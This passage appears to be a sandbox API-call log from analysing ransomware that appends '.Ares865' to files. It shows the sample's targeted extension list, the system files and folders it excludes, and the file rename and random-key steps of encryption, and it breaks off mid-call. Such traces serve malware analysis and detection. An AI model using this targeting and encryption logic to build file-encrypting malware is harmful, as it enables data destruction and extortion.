[0060.613] lstrlenW (lpString="nv2") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="nv2") returned 1 [0060.613] lstrlenW (lpString="nwdb") returned 4 [0060.613] lstrcmpiW (lpString1="ount", lpString2="nwdb") returned 1 [0060.613] lstrlenW (lpString="nyf") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="nyf") returned 1 [0060.613] lstrlenW (lpString="odb") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.613] lstrlenW (lpString="odb") returned 3 [0060.613] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.613] lstrlenW (lpString="oqy") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="oqy") returned 1 [0060.614] lstrlenW (lpString="ora") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="ora") returned 1 [0060.614] lstrlenW (lpString="orx") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="orx") returned 1 [0060.614] lstrlenW (lpString="owc") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="owc") returned 1 [0060.614] lstrlenW (lpString="p96") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="p96") returned 1 [0060.614] lstrlenW (lpString="p97") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="p97") returned 1 [0060.614] lstrlenW (lpString="pan") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="pan") returned 1 [0060.614] lstrlenW (lpString="pdb") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="pdb") returned 1 [0060.614] lstrlenW (lpString="pdm") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="pdm") returned 1 [0060.614] lstrlenW (lpString="pnz") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="pnz") returned 1 [0060.614] lstrlenW (lpString="qry") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="qry") returned 1 [0060.614] lstrlenW (lpString="qvd") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="qvd") returned 1 [0060.614] lstrlenW (lpString="rbf") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="rbf") returned 1 [0060.614] lstrlenW (lpString="rctd") returned 4 [0060.614] lstrcmpiW (lpString1="ount", lpString2="rctd") returned -1 [0060.614] lstrlenW (lpString="rod") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="rod") returned 1 [0060.614] lstrlenW (lpString="rodx") returned 4 [0060.614] lstrcmpiW (lpString1="ount", lpString2="rodx") returned -1 [0060.614] lstrlenW (lpString="rpd") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="rpd") returned 1 [0060.614] lstrlenW (lpString="rsd") returned 3 [0060.614] lstrcmpiW (lpString1="unt", lpString2="rsd") returned 1 [0060.614] lstrlenW (lpString="sas7bdat") returned 8 [0060.614] lstrcmpiW (lpString1="eaccount", lpString2="sas7bdat") returned -1 [0060.615] lstrlenW (lpString="sbf") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="sbf") returned 1 [0060.615] lstrlenW (lpString="scx") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="scx") returned 1 [0060.615] lstrlenW (lpString="sdb") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="sdb") returned 1 [0060.615] lstrlenW (lpString="sdc") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="sdc") returned 1 [0060.615] lstrlenW (lpString="sdf") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="sdf") returned 1 [0060.615] lstrlenW (lpString="sis") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="sis") returned 1 [0060.615] lstrlenW (lpString="spq") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="spq") returned 1 [0060.615] lstrlenW (lpString="te") returned 2 [0060.615] lstrcmpiW (lpString1="nt", lpString2="te") returned -1 [0060.615] lstrlenW (lpString="teacher") returned 7 [0060.615] lstrcmpiW (lpString1="account", lpString2="teacher") returned -1 [0060.615] lstrlenW (lpString="tmd") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="tmd") returned 1 [0060.615] lstrlenW (lpString="tps") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="tps") returned 1 [0060.615] lstrlenW (lpString="trc") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.615] lstrlenW (lpString="trc") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="trc") returned 1 [0060.615] lstrlenW (lpString="trm") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="trm") returned 1 [0060.615] lstrlenW (lpString="udb") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="udb") returned 1 [0060.615] lstrlenW (lpString="udl") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="udl") returned 1 [0060.615] lstrlenW (lpString="usr") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="usr") returned -1 [0060.615] lstrlenW (lpString="v12") returned 3 [0060.615] lstrcmpiW (lpString1="unt", lpString2="v12") returned -1 [0060.616] lstrlenW (lpString="vis") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="vis") returned -1 [0060.616] lstrlenW (lpString="vpd") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="vpd") returned -1 [0060.616] lstrlenW (lpString="vvv") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="vvv") returned -1 [0060.616] lstrlenW (lpString="wdb") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="wdb") returned -1 [0060.616] lstrlenW (lpString="wmdb") returned 4 [0060.616] lstrcmpiW (lpString1="ount", lpString2="wmdb") returned -1 [0060.616] lstrlenW (lpString="wrk") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="wrk") returned -1 [0060.616] lstrlenW (lpString="xdb") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="xdb") returned -1 [0060.616] lstrlenW (lpString="xld") returned 3 [0060.616] lstrcmpiW (lpString1="unt", lpString2="xld") returned -1 [0060.616] lstrlenW (lpString="xmlff") returned 5 [0060.616] lstrcmpiW (lpString1="count", lpString2="xmlff") returned -1 [0060.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865") returned 123 [0060.616] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.ares865"), dwFlags=0x1) returned 1 [0060.617] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.617] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=672) returned 1 [0060.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.618] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.618] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.618] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.619] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x164 [0060.620] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x190000 [0060.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.621] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.621] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.622] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.622] CloseHandle (hObject=0x164) returned 1 [0060.622] CloseHandle (hObject=0x15c) returned 1 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.622] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6535940, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6535940, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf67b6975, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="aoldtz.exe") returned -1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".") returned 1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="..") returned 1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="windows") returned -1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="bootmgr") returned -1 [0060.622] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="temp") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="pagefile.sys") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="boot") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="ids.txt") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="ntuser.dat") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="perflogs") returned -1 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="MSBuild") returned -1 [0060.623] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0060.623] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 115 [0060.623] lstrcpyW (in: lpString1=0x2cce478, lpString2="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" | out: lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" [0060.623] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0060.623] lstrlenW (lpString="Ares865") returned 7 [0060.623] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0060.623] lstrlenW (lpString=".dll") returned 4 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".dll") returned 1 [0060.623] lstrlenW (lpString=".lnk") returned 4 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".lnk") returned 1 [0060.623] lstrlenW (lpString=".ini") returned 4 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".ini") returned 1 [0060.623] lstrlenW (lpString=".sys") returned 4 [0060.623] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".sys") returned 1 [0060.623] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0060.623] lstrlenW (lpString="bak") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0060.623] lstrlenW (lpString="ba_") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0060.623] lstrlenW (lpString="dbb") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0060.623] lstrlenW (lpString="vmdk") returned 4 [0060.623] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0060.623] lstrlenW (lpString="rar") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0060.623] lstrlenW (lpString="zip") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0060.623] lstrlenW (lpString="tgz") returned 3 [0060.623] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0060.623] lstrlenW (lpString="vbox") returned 4 [0060.623] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0060.624] lstrlenW (lpString="vdi") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0060.624] lstrlenW (lpString="vhd") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0060.624] lstrlenW (lpString="vhdx") returned 4 [0060.624] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0060.624] lstrlenW (lpString="avhd") returned 4 [0060.624] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0060.624] lstrlenW (lpString="db") returned 2 [0060.624] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0060.624] lstrlenW (lpString="db2") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0060.624] lstrlenW (lpString="db3") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0060.624] lstrlenW (lpString="dbf") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0060.624] lstrlenW (lpString="mdf") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0060.624] lstrlenW (lpString="mdb") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0060.624] lstrlenW (lpString="sql") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0060.624] lstrlenW (lpString="sqlite") returned 6 [0060.624] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0060.624] lstrlenW (lpString="sqlite3") returned 7 [0060.624] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0060.624] lstrlenW (lpString="sqlitedb") returned 8 [0060.624] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0060.624] lstrlenW (lpString="xml") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0060.624] lstrlenW (lpString="$er") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0060.624] lstrlenW (lpString="4dd") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0060.624] lstrlenW (lpString="4dl") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0060.624] lstrlenW (lpString="^^^") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0060.624] lstrlenW (lpString="abs") returned 3 [0060.624] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0060.625] lstrlenW (lpString="abx") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0060.625] lstrlenW (lpString="accdb") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0060.625] lstrlenW (lpString="accdc") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0060.625] lstrlenW (lpString="accde") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0060.625] lstrlenW (lpString="accdr") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0060.625] lstrlenW (lpString="accdt") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0060.625] lstrlenW (lpString="accdw") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0060.625] lstrlenW (lpString="accft") returned 5 [0060.625] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0060.625] lstrlenW (lpString="adb") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.625] lstrlenW (lpString="adb") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.625] lstrlenW (lpString="ade") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0060.625] lstrlenW (lpString="adf") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0060.625] lstrlenW (lpString="adn") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0060.625] lstrlenW (lpString="adp") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0060.625] lstrlenW (lpString="alf") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0060.625] lstrlenW (lpString="ask") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0060.625] lstrlenW (lpString="btr") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0060.625] lstrlenW (lpString="cat") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0060.625] lstrlenW (lpString="cdb") returned 3 [0060.625] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0060.626] lstrlenW (lpString="ckp") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0060.626] lstrlenW (lpString="cma") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0060.626] lstrlenW (lpString="cpd") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0060.626] lstrlenW (lpString="dacpac") returned 6 [0060.626] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0060.626] lstrlenW (lpString="dad") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0060.626] lstrlenW (lpString="dadiagrams") returned 10 [0060.626] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0060.626] lstrlenW (lpString="daschema") returned 8 [0060.626] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0060.626] lstrlenW (lpString="db-journal") returned 10 [0060.626] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0060.626] lstrlenW (lpString="db-shm") returned 6 [0060.626] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0060.626] lstrlenW (lpString="db-wal") returned 6 [0060.626] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0060.626] lstrlenW (lpString="dbc") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0060.626] lstrlenW (lpString="dbs") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0060.626] lstrlenW (lpString="dbt") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0060.626] lstrlenW (lpString="dbv") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0060.626] lstrlenW (lpString="dbx") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0060.626] lstrlenW (lpString="dcb") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0060.626] lstrlenW (lpString="dct") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dct") returned 1 [0060.626] lstrlenW (lpString="dcx") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="dcx") returned 1 [0060.626] lstrlenW (lpString="ddl") returned 3 [0060.626] lstrcmpiW (lpString1="unt", lpString2="ddl") returned 1 [0060.627] lstrlenW (lpString="dlis") returned 4 [0060.627] lstrcmpiW (lpString1="ount", lpString2="dlis") returned 1 [0060.627] lstrlenW (lpString="dp1") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="dp1") returned 1 [0060.627] lstrlenW (lpString="dqy") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="dqy") returned 1 [0060.627] lstrlenW (lpString="dsk") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="dsk") returned 1 [0060.627] lstrlenW (lpString="dsn") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="dsn") returned 1 [0060.627] lstrlenW (lpString="dtsx") returned 4 [0060.627] lstrcmpiW (lpString1="ount", lpString2="dtsx") returned 1 [0060.627] lstrlenW (lpString="dxl") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="dxl") returned 1 [0060.627] lstrlenW (lpString="eco") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="eco") returned 1 [0060.627] lstrlenW (lpString="ecx") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="ecx") returned 1 [0060.627] lstrlenW (lpString="edb") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="edb") returned 1 [0060.627] lstrlenW (lpString="epim") returned 4 [0060.627] lstrcmpiW (lpString1="ount", lpString2="epim") returned 1 [0060.627] lstrlenW (lpString="fcd") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="fcd") returned 1 [0060.627] lstrlenW (lpString="fdb") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="fdb") returned 1 [0060.627] lstrlenW (lpString="fic") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="fic") returned 1 [0060.627] lstrlenW (lpString="flexolibrary") returned 12 [0060.627] lstrcmpiW (lpString1="7}.oeaccount", lpString2="flexolibrary") returned -1 [0060.627] lstrlenW (lpString="fm5") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="fm5") returned 1 [0060.627] lstrlenW (lpString="fmp") returned 3 [0060.627] lstrcmpiW (lpString1="unt", lpString2="fmp") returned 1 [0060.627] lstrlenW (lpString="fmp12") returned 5 [0060.627] lstrcmpiW (lpString1="count", lpString2="fmp12") returned -1 [0060.627] lstrlenW (lpString="fmpsl") returned 5 [0060.627] lstrcmpiW (lpString1="count", lpString2="fmpsl") returned -1 [0060.627] lstrlenW (lpString="fol") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fol") returned 1 [0060.628] lstrlenW (lpString="fp3") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fp3") returned 1 [0060.628] lstrlenW (lpString="fp4") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fp4") returned 1 [0060.628] lstrlenW (lpString="fp5") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fp5") returned 1 [0060.628] lstrlenW (lpString="fp7") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fp7") returned 1 [0060.628] lstrlenW (lpString="fpt") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="fpt") returned 1 [0060.628] lstrlenW (lpString="frm") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="frm") returned 1 [0060.628] lstrlenW (lpString="gdb") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.628] lstrlenW (lpString="gdb") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.628] lstrlenW (lpString="grdb") returned 4 [0060.628] lstrcmpiW (lpString1="ount", lpString2="grdb") returned 1 [0060.628] lstrlenW (lpString="gwi") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="gwi") returned 1 [0060.628] lstrlenW (lpString="hdb") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="hdb") returned 1 [0060.628] lstrlenW (lpString="his") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="his") returned 1 [0060.628] lstrlenW (lpString="ib") returned 2 [0060.628] lstrcmpiW (lpString1="nt", lpString2="ib") returned 1 [0060.628] lstrlenW (lpString="idb") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="idb") returned 1 [0060.628] lstrlenW (lpString="ihx") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="ihx") returned 1 [0060.628] lstrlenW (lpString="itdb") returned 4 [0060.628] lstrcmpiW (lpString1="ount", lpString2="itdb") returned 1 [0060.628] lstrlenW (lpString="itw") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="itw") returned 1 [0060.628] lstrlenW (lpString="jet") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="jet") returned 1 [0060.628] lstrlenW (lpString="jtx") returned 3 [0060.628] lstrcmpiW (lpString1="unt", lpString2="jtx") returned 1 [0060.628] lstrlenW (lpString="kdb") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="kdb") returned 1 [0060.629] lstrlenW (lpString="kexi") returned 4 [0060.629] lstrcmpiW (lpString1="ount", lpString2="kexi") returned 1 [0060.629] lstrlenW (lpString="kexic") returned 5 [0060.629] lstrcmpiW (lpString1="count", lpString2="kexic") returned -1 [0060.629] lstrlenW (lpString="kexis") returned 5 [0060.629] lstrcmpiW (lpString1="count", lpString2="kexis") returned -1 [0060.629] lstrlenW (lpString="lgc") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="lgc") returned 1 [0060.629] lstrlenW (lpString="lwx") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="lwx") returned 1 [0060.629] lstrlenW (lpString="maf") returned 3 [0060.629] lstrcmpiW (lpString1="unt", lpString2="maf") returned 1 [0060.629] lstrlenW (lpString="maq") returned 3 [0060.629] lstrcmpiW (lpString1="unt", 